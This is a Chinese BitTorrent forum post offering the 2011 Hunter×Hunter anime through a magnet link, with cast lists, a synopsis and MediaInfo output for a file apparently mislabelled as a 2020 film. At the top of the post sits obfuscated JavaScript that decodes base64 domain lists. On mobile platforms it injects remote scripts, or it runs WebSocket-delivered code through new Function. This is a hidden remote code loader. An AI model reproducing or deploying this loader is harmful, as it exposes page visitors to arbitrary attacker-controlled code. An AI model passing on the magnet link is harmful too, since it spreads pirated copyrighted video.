全职猎人2011[中文字幕].Hunter.Hunter.2020.1080p.迅雷下载 5.80GB

版主小s 1月前 280

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 全职猎人2011 / 新全职猎人

◎片 名 HUNTER×HUNTER

◎年 代 2011

◎产 地 日本

◎类 别 剧情 / 动画 / 冒险

◎语 言 日语

◎上映日期 2011-10-02(日本)

◎IMDb链接 https://www.imdb.com/title/tt2098220/

◎豆瓣评分 9.3/10 (26931人评价)

◎豆瓣链接 https://movie.douban.com/subject/6748086/

◎集 数 148

◎片 长 24分钟

◎导 演 神志那弘志 Hiroshi K?jina (id:1021603)

青木弘安 Aoki Hiroyasu (id:1432327)

矢岛哲生 Tetsuo Yajima (id:1407534)

米田和弘 Kazuhiro Yoneda (id:1382386)

高桥知也 Takahashi Tomoya (id:1427222)

松村政辉 Matsumura Masaki (id:1432201)

友田政晴 Tomoda Masaharu (id:1432313)

牛岛新一郎 Ushijima Shin'ichirō (id:1406613)

竹下健一 Takeshita Ken'ichi (id:1431736)

古桥一浩 Kazuhiro Furuhashi (id:1316475)

◎编 剧 富坚义博 Yoshihiro Togashi (id:1314009)

前川淳 Atsushi Maekawa (id:1408909)

广田光毅 Mitsutaka Hirota (id:1360323)

米村正二 Shoji Yonemura (id:1312886)

上代务 Kamishiro Tsutomu (id:1439950)

◎演 员 潘惠美 Megumi Han (id:1324022)

伊濑茉莉也 Mariya Ise (id:1275190)

泽城美雪 Miyuki Sawashiro (id:1019908)

藤原启治 Keiji Fujiwara (id:1028837)

浪川大辅 Daisuke Namikawa (id:1001127)

宫野真守 Mamoru Miyano (id:1018576)

内田直哉 Naoya Uchida (id:1164566)

山口胜平 Kappei Yamaguchi (id:1018954)

日高法子 Noriko Hidaka (id:1019382)

荒川美穗 Miho Arakawa (id:1315672)

朴璐美 Romi Park (id:1005216)

大塚明夫 Akio ?tsuka (id:1035615)

大桥贤一郎 KENN (id:1335643)

前田玲奈 Rena Maeda (id:1327041)

木内秀信 Hidenobu Kiuchi (id:1006385)

山寺宏一 K?ichi Yamadera (id:1019299)

松风雅也 Masaya Matsukaze (id:1313564)

能登麻美子 Mamiko Noto (id:1008256)

堀内贤雄 Ken'y? Horiuchi (id:1091129)

岩男润子 Junko Iwao (id:1006012)

永井一郎 Ichir? Nagai (id:1054358)

银河万丈 Banj? Ginga (id:1042350)

平野绫 Aya Hirano (id:1031173)

岸尾大辅 Daisuke Kishio (id:1001587)

关俊彦 Toshihiko Seki (id:1020051)

寺崎裕香 Yuka Terasaki (id:1359863)

植田佳奈 Kana Ueda (id:1019859)

横山智佐 Chisa Yokoyama (id:1038875)

池田秀一 Sh?ichi Ikeda (id:1038512)

内山昂辉 Koki Uchiyama (id:1312902)

藤村步 Ayumi Fujimura (id:1052148)

立木文彦 Fumihiko Tachiki (id:1048550)

羽多野涉 Wataru Hatano (id:1034346)

楠大典 Taiten Kusunoki (id:1107327)

三木真一郎 Shinichir? Miki (id:1036235)

高木涉 Wataru Takagi (id:1025675)

井上喜久子 Kikuko Inoue (id:1028676)

飞田展男 Nobuo Tobita (id:1043276)

远藤绫 Aya End? (id:1008446)

内田真礼 Maaya Uchida (id:1319106)

高桥广树 Hiroki Takahashi (id:1051347)

大谷育江 Ikue Ootani (id:1025401)

二又一成 Issei Futamata (id:1033902)

安济知佳 Chika Anzai (id:1351270)

子安武人 Takehito Koyasu (id:1054354)

山中真寻 Yamanaka Masahiro (id:1422023)

梅津秀行 Hideyuki Umezu (id:1024439)

上田祐司 Y?ji Ueda (id:1019902)

黑田崇矢 Takaya Kuroda (id:1197854)

齐藤次郎 Saitou Jirou (id:1409754)

逢坂良太 Ryota Ohsaka (id:1320731)

手冢弘道 Tezuka Hiromichi (id:1411699)

森训久 Mori Norihisa (id:1401090)

大竹宏 Hiroshi ?take (id:1168170)

潘惠子 Keiko Han (id:1003642)

伊藤荣次 Itou Eiji (id:1110465)

后藤弘树 Hiroki Got? (id:1382387)

高城元气 Motoki Takagi (id:1318831)

野岛裕史 Hirofumi Nojima (id:1003138)

松山鹰志 Takashi Matsuyama (id:1122604)

长岛雄一 Y?ichi Nagashima (id:1130371)

久保由利香 Yurika Kubo (id:1349284)

川田绅司 Shinji Kawada (id:1204017)

小野友树 Yuuki Ono (id:1244490)

大西健晴 Oonishi Takeharu (id:1399742)

花轮英司 Eiji Hanawa (id:1414049)

菊池正美 Masami Kikuchi (id:1048863)

金丸淳一 Jun'ichi Kanemaru (id:1381864)

(id:1422532)

池田昌子 Masako Ikeda (id:1017180)

三石琴乃 Kotono Mitsuishi (id:1037583)

佐武宇绮 Uki Satake (id:1275353)

户田惠 Toda Megumi (id:1399645)

丸山正雄 Masao Maruyama (id:1020707)

前山田健一 hyadain (id:1390902)

平野义久 Hirano Yoshihisa (id:1406691)

伊藤智彦 Itou Tomohiko (id:1315992)

坂田纯一 Sakata Jun`ichi (id:1316435)

奥野浩行 Okuno Hiroyuki (id:1431886)

◎标 签 富坚义博 / 动画 / 动漫 / 日本动画 / 日本 / 热血 / 经典 / 富奸

◎简 介

小杰富力士(潘惠美配音)自幼失去双亲,由婶婶抚养长大,自由的大海和幽深的森林培养了他得天独厚的敏锐和豁达。长大后的小杰偶然得知,自己的父亲并没有死亡,并且留给了他一个任务,这个任务就是:成为“猎人”,然后找到他。“猎人”,那个时代最风光的职业,经过层层挑战千挑万选,只有最最优秀的人才能够获得猎人执照,而有了这张执照,便可以在这个凶险的世界里更自如的生存下去。为了追随父亲的脚步,小杰上路了。这一路暗礁重重,但是小杰凭借自己的本能结识了优秀的朋友,志愿成为医生的雷欧力(藤原启治配音),最后一个窟卢塔族酷拉皮卡(泽城美雪配音),还有他这辈子最重要的同伴奇犽(伊濑茉莉也配音)。此外,那宿命中的敌人们也出现了——幻影旅团。

本动画为2011年MADEHOUSE公司的重制版,剧情上和旧版没有区别,但启用了全新的声优阵容,在制作上也更加的精美细致。

  1. General

  2. Unique ID : 228251548988149219471608248018588730554 (0xABB7A638D8A2ACEFB3B023052C2D04BA)

  3. Complete name : Hunter.Hunter.2020.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 5.80 GiB

  7. Duration : 1 h 33 min

  8. Overall bit rate : 8 917 kb/s

  9. Movie name : Hunter Hunter 2020 1080p BluRay DTS x265-10bit-HDS

  10. Encoded date : UTC 2021-06-27 07:00:57

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 33 min

  20. Bit rate : 7 349 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.200

  30. Stream size : 4.78 GiB (82%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 33 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1 005 MiB (17%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 30 min

  61. Bit rate : 22.5 kb/s

  62. Count of elements : 1553

  63. Stream size : 14.6 MiB (0%)

  64. Title : ENG

  65. Language : English

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 23 min

  75. Bit rate : 17.3 kb/s

  76. Count of elements : 1300

  77. Stream size : 10.4 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Text #3

  83. ID : 5

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 23 min

  89. Bit rate : 17.7 kb/s

  90. Count of elements : 1300

  91. Stream size : 10.7 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Text #4

  97. ID : 6

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 23 min

  103. Bit rate : 28.0 kb/s

  104. Count of elements : 1300

  105. Stream size : 16.8 MiB (0%)

  106. Title : CHS&ENG

  107. Language : Chinese

  108. Default : No

  109. Forced : No


  110. Text #5

  111. ID : 7

  112. Format : PGS

  113. Muxing mode : zlib

  114. Codec ID : S_HDMV/PGS

  115. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration : 1 h 23 min

  117. Bit rate : 28.4 kb/s

  118. Count of elements : 1300

  119. Stream size : 17.1 MiB (0%)

  120. Title : CHT&ENG

  121. Language : Chinese

  122. Default : No

  123. Forced : No


  124. Menu

  125. 00:00:00.000 : en:Chapter 01

  126. 00:08:04.693 : en:Chapter 02

  127. 00:16:31.407 : en:Chapter 03

  128. 00:23:29.742 : en:Chapter 04

  129. 00:30:48.847 : en:Chapter 05

  130. 00:38:18.379 : en:Chapter 06

  131. 00:45:41.739 : en:Chapter 07

  132. 00:54:09.955 : en:Chapter 08

  133. 01:00:42.848 : en:Chapter 09

  134. 01:08:37.405 : en:Chapter 10

  135. 01:16:06.771 : en:Chapter 11

  136. 01:22:55.596 : en:Chapter 12



TAGS 冒险 剧情 动画

磁力链:
  • magnet:?xt=urn:btih:B852B2608B2CFE803CBD997445FF6FC672B7D34A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回